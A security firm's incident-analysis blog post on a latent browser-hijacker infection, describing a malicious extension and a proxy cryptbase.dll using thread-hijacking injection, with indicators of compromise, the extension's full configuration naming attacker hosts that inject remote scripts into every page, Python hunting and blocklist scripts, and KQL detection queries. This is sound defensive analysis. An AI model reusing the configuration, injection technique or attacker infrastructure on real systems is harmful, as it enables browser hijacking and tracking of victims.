Analysing a latent malware infection on a recently MDE-onboarded machine (Part 2)

Cyber security – White Hat – September 13, 2023

Background

Recently, an interesting latent malware infection was found on a newly onboarded machine at one of our clients (the Client). Microsoft Defender for Endpoint (MDE) reported anomalies about the computer shortly after onboarding, but uncovering the inner workings of the malware and its infection methods required a thorough investigation. We present the second part of the investigation in this article with the Client’s approval.

(For the Part 1 see our previous post: https://whitehat.eu/analysing-a-latent-malware-infection-on-a-recently-mde-onboarded-machine/)

Malware analysis

The browser extension

Continuing on, we loaded the extension standalone into a clean browser inside a virtual machine (VM) to inspect its network connections and communication. For the investigation, the VM’s internet connection was proxied through Burp Proxy.

The extension was loaded into a fresh, up-to-date Edge browser. After the initial loading, the extension presented itself with a small size, a clean icon, and an empty name:

[Screenshot: extension attributes after loading]

Clicking the extension in the toolbar showed nothing, as depicted below:

[Screenshot: the extension opened from the toolbar]

After the installation of the extension, the malware started communicating with the “de.withtls[.]net” domain to register itself and obtained its configuration as a JSON structure (see Appendix 1).

For example, the JSON contains various advertising-related German domain entries that the extension keeps track of:

[Screenshot: advertising-related German domain entries in the JSON configuration]

The extension can also inject arbitrary externally hosted JS files into any visited webpage:

[Screenshot: externally hosted JS injection rules in the configuration]

Another aspect of the extension is that it proxies every search term through the malicious actor’s infrastructure. Here the tested search term was “How to download more RAM” in Google, and the response came back with a Yahoo search term:

[Screenshots: proxied Google search request and the returned Yahoo search term]

Furthermore, the extension carries a Google Analytics identifier, giving the attacker the ability to further track the victim through the visited sites. In addition, it injects standard Google trackers into every page the user opens to keep that tracking ability up.

[Screenshot: Google Analytics identifier and injected trackers]

Reverse engineering the hijacker DLL

Since we used Edge browser in our lab environment, the malware installed the fake cryptbase.dll at the following path:

C:\Program Files (x86)\Microsoft\Edge\Application\cryptbase.dll

[Screenshot: fake cryptbase.dll in the Edge Application folder]

The static analysis revealed the main functionalities and apparent goals of the executable, leading us to look for thread injection, as it manipulates memory page protection (changing it to Read-Write-Execute) and performs a suspend – inject – resume sequence on a thread:

[Screenshot: static analysis of the DLL’s imports and strings]

We loaded the sample into a disassembler to follow the execution flow. At first, it loads the legitimate cryptbase.dll from the System32 folder.

[Screenshot: loading the legitimate cryptbase.dll from System32]

The target thread is selected in the injecting code. In our case it was the thread of the so-called NetGetJoinInformation, into which the shellcode was injected.

[Screenshot: target thread selection in the disassembly]

After that, it enumerates the threads in the snapshot created by the CreateToolhelp32Snapshot API, injects its shellcode, and changes the protection of the targeted memory page to RWX.

[Screenshot: thread enumeration via CreateToolhelp32Snapshot and the RWX protection change]

Here is the thread injection itself in the code. In the middle, it updates the target thread’s instruction pointer (the RIP register) to point to the shellcode written into the target process’s memory:

[Screenshot: thread hijacking code updating RIP to the shellcode address]

Regarding this thread injection technique, we highly recommend the following article, which describes it in detail from a red team perspective:

https://www.ired.team/offensive-security/code-injection-process-injection/injecting-to-remote-process-via-thread-hijacking

Indicators of compromise

Domains:

  • de.mynodejs[.]net
  • updatepush[.]com
  • de.withtls[.]net (browser extension)
  • g.httpsweb[.]com (browser extension)
  • jspixel[.]com (browser extension)
  • clinedafi[.]net (browser extension)

Files, packages:

  • Vulnerable official Node.js end-of-life version in default location: node-v6.10.3-x86.msi
    SHA256: d4000be1329737bd2f4c2e54abc939ca249c11cbcc8898240fece37cb74cf09f
  • Themida-packed CPython exe component
    SHA256: f87ed053f4d26ad33aee5e574087aedaa65d932854b7cb065893e1c0fa5db3d5
  • Proxy DLLs in the browser’s folder:
    • C:\Program Files (x86)\Microsoft\Edge\Application\cryptbase.dll
    • C:\Program Files (x86)\Google\Chrome\Application\version.dll
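
Both proxy DLLs listed above share a name with a DLL that normally lives in System32 or SysWOW64, yet the browser loaded them from its own Application folder. The following Python turns that observation into a hunting rule. It is an added example, not part of the original write-up or of MDE: the event records are constructed, and their field names (FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessFolderPath) are assumptions modelled on MDE image-load telemetry, with FolderPath treated as the full path of the loaded image. The DLL name set is seeded only with the two names from this case.

```python
import ntpath

# DLL names from this case; the set is illustrative and should be extended with
# other system DLLs that are commonly dropped next to a target executable.
PROXIED_SYSTEM_DLLS = {"cryptbase.dll", "version.dll"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# Constructed image-load records (field names are assumptions modelled on MDE
# DeviceImageLoadEvents columns; FolderPath holds the full path of the image,
# InitiatingProcessFolderPath the full path of the loading executable).
SAMPLE_EVENTS = [
    {"DeviceName": "ws01", "FileName": "cryptbase.dll",
     "FolderPath": r"C:\Program Files (x86)\Microsoft\Edge\Application\cryptbase.dll",
     "InitiatingProcessFileName": "msedge.exe",
     "InitiatingProcessFolderPath": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"},
    {"DeviceName": "ws01", "FileName": "cryptbase.dll",
     "FolderPath": r"C:\Windows\System32\cryptbase.dll",
     "InitiatingProcessFileName": "explorer.exe",
     "InitiatingProcessFolderPath": r"C:\Windows\explorer.exe"},
    {"DeviceName": "ws02", "FileName": "version.dll",
     "FolderPath": r"C:\Program Files (x86)\Google\Chrome\Application\version.dll",
     "InitiatingProcessFileName": "chrome.exe",
     "InitiatingProcessFolderPath": r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"},
    {"DeviceName": "ws02", "FileName": "chrome_elf.dll",
     "FolderPath": r"C:\Program Files (x86)\Google\Chrome\Application\chrome_elf.dll",
     "InitiatingProcessFileName": "chrome.exe",
     "InitiatingProcessFolderPath": r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"},
    {"DeviceName": "ws03", "FileName": "version.dll",
     "FolderPath": r"C:\Users\Public\version.dll",
     "InitiatingProcessFileName": "notepad.exe",
     "InitiatingProcessFolderPath": r"C:\Windows\System32\notepad.exe"},
]


def _dir(path):
    """Lower-cased, normalised parent directory of a Windows path."""
    return ntpath.normcase(ntpath.dirname(path))


def classify_load(event):
    """Return None for a benign load, otherwise a short reason string."""
    if event["FileName"].lower() not in PROXIED_SYSTEM_DLLS:
        return None  # not a DLL name we track
    load_dir = _dir(event["FolderPath"])
    if load_dir.startswith(SYSTEM_DIRS):
        return None  # loaded from its legitimate home
    if load_dir == _dir(event["InitiatingProcessFolderPath"]):
        # The copy sits next to the executable that loads it: the proxy-DLL
        # pattern seen with cryptbase.dll and version.dll in this case.
        return "system DLL loaded side by side with its host process"
    return "system DLL loaded from a non-system directory"


def find_hijack_candidates(events):
    """Return (DeviceName, loader, loaded path, reason) for every suspicious load."""
    return [(e["DeviceName"], e["InitiatingProcessFileName"], e["FolderPath"], reason)
            for e in events if (reason := classify_load(e))]


if __name__ == "__main__":
    for device, loader, path, reason in find_hijack_candidates(SAMPLE_EVENTS):
        print(f"{device}: {loader} loaded {path} ({reason})")
```

The rule deliberately keys on the directory relationship rather than on the hash, so it still fires when the attacker rebuilds the DLL; the legitimate System32 load on ws01 and the browser's own chrome_elf.dll are left alone.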

Appendix 1 – Browser extension JSON configuration

{
    "xconfig": {
        "livejs": {
            "active": true,
            "goNuclear": false,
            "useTheForce": true
        },
        "redir": {
            "active": true,
            "unblockAfter": 600000
        },
        "hiddenWindow": {
            "windowCloseTimeout": 600000,
            "openAlways": true
        },
        "gTracker": {
            "active": false,
            "url": "https://data.ad-count.com/g/"
        },
        "urlCollector": {
            "active": false,
            "url": "https://data.ad-count.com/url/",
            "blacklist": []
        },
        "chainTracker": {
            "active": false,
            "url": "https://data.ad-count.com/ct/"
        },
        "unblockAll": {
            "active": true,
            "matchWWW": true,
            "domains": [
                "kostenlos.de",
                "gutscheine.biz",
                "gutscheinlager.de",
                "sale-forever.de",
                "shopping-rabatt.de",
                "couponster.de",
                "sparwelt.de",
                "gutscheinagent.de",
                "gutscheinbox.de",
                "gutscheingirl.de",
                "gutscheintabelle.de",
                "derbestegutschein.de",
                "gutscheine.de",
                "gutschein.de",
                "gutscheinpony.de",
                "gutscheine.com",
                "gutscheincodes.de",
                "coupons4u.de",
                "gutscheinsammler.de",
                "mydealz.de",
                "gutscheine-oase.de"
            ]
        },
        "derailer": {
            "domainRedirects": [
                [
                    "www.searchfolder.net/1",
                    "https://www.searchfolder.net/1?url={URL}"
                ],
                [
                    "laserveradedomaina.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "workupgrade.thebestcontentsafesitealways.stream",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "target.ok.de",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "letsupdateourdomain.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "www.onclickmax.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "syndication.exdynsrv.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "ladomainadeserver.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "onclkds.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "www.greatdexchange.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ],
                [
                    "go.oclasrv.com",
                    "https://trends.google.com/trends/hottrends/visualize"
                ]
            ]
        },
        "telemetry": {
            "active": true,
            "account": "UA-10XXXXXX5-10",
            "url": "https://www.jspixel.com/p/",
            "headers": [
                [
                    "X-AnalPixel",
                    "1.0"
                ]
            ]
        },
        "extmgr": {
            "active": true,
            "reportURL": "https://de.withtls.net/ext?{std}",
            "delaySet": 30,
            "tempTimeout": 15,
            "mode": "temp",
            "actions": {
                "pdffkfellgipmhklpdmokmckkkfcopbh": {
                    "enable": false
                },
                "bgnkhhnnamicmpeenaelnjfhikgbkllg": {
                    "enable": false
                },
                "odfafepnkmbhccpbejgmiehpchacaeak": {
                    "enable": false
                },
                "cjpalhdlnbpafiamejdnhcphjbkeiagm": {
                    "enable": false
                },
                "gighmmpiobklfepjocnamgkkbiglidom": {
                    "enable": false
                },
                "ndcileolkflehcjpmjnfbnaibdcgglog": {
                    "enable": false
                },
                "gmgoamodcdcjnbaobigkjelfplakmdhh": {
                    "enable": false
                },
                "cfhdojbkjhnklbpkdaibdccddilifddb": {
                    "enable": false
                }
            }
        },
        "jsRunner": {
            "active": true,
            "defaults": null,
            "matchRules": [
                {
                    "selectors": [
                        [
                            "matches",
                            "*"
                        ]
                    ],
                    "htmlScripts": [
                        "https://de.withtls.net/data/runner/ga.html?{std}"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "matches",
                            "*://www.google.*"
                        ],
                        [
                            "matchesPath",
                            "/search"
                        ]
                    ],
                    "htmlScripts": [
                        "https://de.withtls.net/data/runner/gas.html?{std}"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "matches",
                            "*://www.bing.*"
                        ],
                        [
                            "matchesPath",
                            "/search"
                        ]
                    ],
                    "htmlScripts": [
                        "https://de.withtls.net/data/runner/bing.html?{std}"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "matches",
                            "*://www.google.*"
                        ],
                        [
                            "matchesPath",
                            "/search"
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/pst.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "any",
                            [
                                [
                                    "matches",
                                    "*://anonym.de"
                                ],
                                [
                                    "matches",
                                    "*://www.yadore.com"
                                ],
                                [
                                    "matches",
                                    "*://yadex.com"
                                ]
                            ]
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/u/d?{std}"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "matches",
                            "*://www.amazon.*"
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/asin.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "matches",
                            "*://www.ebay.de"
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/eb_search.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "any",
                            [
                                [
                                    "matches",
                                    "*://www.google.*"
                                ]
                            ],
                            [
                                "matchesPath",
                                "/search"
                            ]
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/gg_search.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "matches",
                            "*://www.amazon.de"
                        ],
                        [
                            "matchesPath",
                            "/s"
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/az_search.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "any",
                            [
                                [
                                    "matches",
                                    "*://bing.com"
                                ],
                                [
                                    "matches",
                                    "*://www.bing.com"
                                ]
                            ],
                            [
                                "matchesPath",
                                "/search*"
                            ]
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/bg_search.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "any",
                            [
                                [
                                    "matches",
                                    "*://*.search.yahoo.com"
                                ],
                                [
                                    "matches",
                                    "*://search.yahoo.com"
                                ]
                            ],
                            [
                                "matchesPath",
                                "/search*"
                            ]
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/yo_search.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                },
                {
                    "selectors": [
                        [
                            "matches",
                            "*://*.kelkoogroup.net"
                        ],
                        [
                            "matchesPath",
                            "/go"
                        ]
                    ],
                    "scripts": [
                        "https://de.withtls.net/data/runner/kk_check.js?{std}&dc=1"
                    ],
                    "timeout": null,
                    "delay": null,
                    "ttl": null
                }
            ]
        },
        "backgroundPage": {
            "active": false,
            "url": "http://bg.jspixel.com/backgroundPage2.html?{std}"
        },
        "notifier": {
            "domainNotifications": [
                [
                    [
                        "premiumsearchtech.com/c.php*"
                    ],
                    "https://data.ad-count.com/notifier/?{std}"
                ]
            ]
        }
    },
    "domains": {
        "id": "merge#1686890254.2937276",
        "url": "https://de.withtls.net/data/domain/merge.dat?iid=CC05XXXX-XXXX-XXXX-XX85-BD5D5C36E266&v=4.28&ver=2.4.11&tp=e&ts=1686920420&dlid=merge"
    },
    "livejs": {
        "id": "gtm_1.0#1593605330.978869",
        "url": "https://de.withtls.net/get?iid=CC05XXXX-XXXX-XXXX-XX85-BD5D5C36E266&v=4.28&ver=2.4.11&tp=e&ts=1686920420&ljsid=gtm_1.0"
    }
}
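
The configuration above mixes three kinds of hostnames: infrastructure the extension fetches code or reports from (scripts, htmlScripts, url, reportURL), destinations it redirects the user to (the second element of each domainRedirects pair, including benign trends.google.com), and sites it merely matches or whitelists (unblockAll.domains, redirect sources). Only the first group belongs on a blocklist. The Python below, an added example and not part of the original analysis, walks the JSON and sorts hostnames into those buckets, defanging them in the same style as the indicators above. It runs on a trimmed excerpt of Appendix 1 embedded inline; the excerpt (shortened lists, iid replaced by a placeholder) and the bucket names are constructed for the example.

```python
import json
from urllib.parse import urlparse

# Trimmed excerpt of the Appendix 1 configuration (constructed for this example:
# most list entries removed, the iid query value replaced by a placeholder).
SAMPLE_CONFIG = r'''
{
  "xconfig": {
    "gTracker": {"active": false, "url": "https://data.ad-count.com/g/"},
    "unblockAll": {"active": true, "matchWWW": true,
                   "domains": ["kostenlos.de", "gutscheine.biz"]},
    "derailer": {"domainRedirects": [
      ["www.searchfolder.net/1", "https://www.searchfolder.net/1?url={URL}"],
      ["laserveradedomaina.com", "https://trends.google.com/trends/hottrends/visualize"]
    ]},
    "telemetry": {"active": true, "account": "UA-10XXXXXX5-10",
                  "url": "https://www.jspixel.com/p/"},
    "extmgr": {"active": true, "reportURL": "https://de.withtls.net/ext?{std}"},
    "jsRunner": {"active": true, "matchRules": [
      {"selectors": [["matches", "*"]],
       "htmlScripts": ["https://de.withtls.net/data/runner/ga.html?{std}"]},
      {"selectors": [["matches", "*://www.amazon.*"]],
       "scripts": ["https://de.withtls.net/data/runner/asin.js?{std}&dc=1"]}
    ]},
    "backgroundPage": {"active": false,
                       "url": "http://bg.jspixel.com/backgroundPage2.html?{std}"}
  },
  "domains": {"id": "merge#1686890254.2937276",
              "url": "https://de.withtls.net/data/domain/merge.dat?iid=IID-PLACEHOLDER&v=4.28"}
}
'''

# Keys whose string values are URLs the extension actively fetches or posts to.
FETCH_KEYS = {"url", "reportURL", "scripts", "htmlScripts"}


def walk(node, path=()):
    """Yield (path, value) for every string leaf; path mixes dict keys and list indices."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk(value, path + (key,))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk(value, path + (index,))
    elif isinstance(node, str):
        yield path, node


def host_of(value):
    """Hostname of a real URL, or None for bare domains and selector patterns like '*://...'."""
    if "://" not in value:
        return None
    host = urlparse(value).hostname  # '*' is not a valid scheme, so patterns yield None
    return host.lower() if host else None


def classify_hosts(config):
    """Split hostnames into fetched infrastructure, redirect destinations and matched sites."""
    fetched, redirect_targets, matched = set(), set(), set()
    for path, value in walk(config):
        keys = [p for p in path if isinstance(p, str)]
        host = host_of(value)
        if "domainRedirects" in keys:
            # Each pair is [source pattern, destination URL]; only the source is a domain.
            if host:
                redirect_targets.add(host)
            else:
                matched.add(value.split("/", 1)[0].lower())
        elif host and keys[-1] in FETCH_KEYS:
            fetched.add(host)
        elif keys[-1] == "domains" and not host:
            matched.add(value.lower())
    return {"fetched": fetched, "redirect_targets": redirect_targets, "matched": matched}


def defang(host):
    """Neutralise the last dot, matching the 'de.withtls[.]net' style of the IoC list."""
    head, _, tld = host.rpartition(".")
    return f"{head}[.]{tld}"


def build_blocklist(config_text):
    """Parse the configuration and return sorted, defanged hostnames per bucket."""
    buckets = classify_hosts(json.loads(config_text))
    return {name: [defang(h) for h in sorted(hosts)] for name, hosts in buckets.items()}


if __name__ == "__main__":
    for bucket, hosts in build_blocklist(SAMPLE_CONFIG).items():
        print(f"{bucket}:")
        for host in hosts:
            print("   ", host)
```

Run against the full appendix, the "fetched" bucket yields the hosts worth blocking and hunting for in DeviceNetworkEvents, while "redirect_targets" and "matched" are reviewed by hand so that trends.google.com or the German coupon sites are not blocked by mistake.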

Appendix 2 – KQL series

DeviceNetworkEvents
| where RemoteUrl contains "withtls.net"

DeviceProcessEvents
| where InitiatingProcessSHA256 contains "518ea2f7e77780ad2eaeadaa818c8d45ac480a62d8b503f88e25412572ebce49"
| summarize count() by DeviceName

DeviceRegistryEvents
| where RegistryKey contains @"SOFTWARE\Policies\Microsoft\Windows Defender\Spynet"
| where RegistryValueName == "SpyNetReporting"
| where RegistryValueData contains "0"

DeviceRegistryEvents
| where RegistryKey contains @"SOFTWARE\Policies\Microsoft\Windows Defender\Spynet"
| where RegistryValueName == "SubmitSamplesConsent"
//| where RegistryValueData contains "2"

DeviceRegistryEvents
| where RegistryKey contains @"SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Path"
| where RegistryValueName == @"C:\"

Written by: White Hat
